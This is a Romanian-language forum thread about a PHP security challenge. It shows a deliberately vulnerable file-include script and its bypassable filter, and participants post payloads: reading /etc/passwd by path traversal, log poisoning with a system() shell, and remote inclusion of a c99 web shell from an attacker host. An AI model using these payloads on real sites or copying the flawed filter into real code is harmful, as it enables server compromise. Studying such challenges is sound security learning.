[f easy] vulnerabilitate php

[kw3rln]

<?php
if(isset($_REQUEST['doc']))
{
    $doc = $_REQUEST['doc'];
    //Anti RFI-protection
    $doc = str_replace('http://','',$doc);
    include($doc);
}
?>

vulnerabil la 3 atacuri, vedeti care-s alea

[amprenta]

pai ar fi

path disclosure -adica doc=cacat .. ne va da o eroare Warning .....

NO SUCH file or directoy in" /home/draci/public_html/raha.php"

file disclosure - doc=../../../../etc/passwd de ex

[x.o]

LFI,Remote command execution + rfi

[kw3rln]

yep.. da si rfi ii

[vladiii]

yep.. da si rfi ii

Am fost primul care ti-a zis pe mess de asta

[moubik]

da, era evident

pacat ca nu am fost in weekend aici

[Imperfect]

kw3rln , mai fa challengeuri de genu asta ^'> !

[michee]

daca se poate sa ma lamuriti si pe mine

remote code execution cred c-ar fi daca

fac ceva de genul doc = <? system($_GET['cmd'])?> , imi logheaza asta intr-un loc apache si apoi folosesc LFI ca sa-l execut, nu ?

RFI cum se face?

merge sa includ un fisier remote daca fac doar doc='www.hackserver.com/cmd.php' de exemplu? adik fara http in fata?

saum cum se face RFI aici?'

[michee]

si tot nu m-ai lamurit.....

[kw3rln]

si tot nu m-ai lamurit.....

avem $doc = str_replace('http://','',$doc); da?

dak pui $doc= httphttp://://site.com/c99.txt?

ce se intampla?

[michee]

hahaha:))

da,frumos.

[lucian]

la rfi ar mai merge si ftp://user:pass@host/fisier

si teoretic cred ca merge si mms://host/fisier

sau gopher ... acu nu sunt sigur ... ca merg astea ... le-a incercat cineva? ... fiindca am vazut in mai multe site-uri ca se facea verificarea url-ului daca contine si protocoalele ftp ... telnet ... mms ... gopher

gen ... if(!eregi("(http://|https://|ftp://|telnet://|mms://|gopher://|news://) .....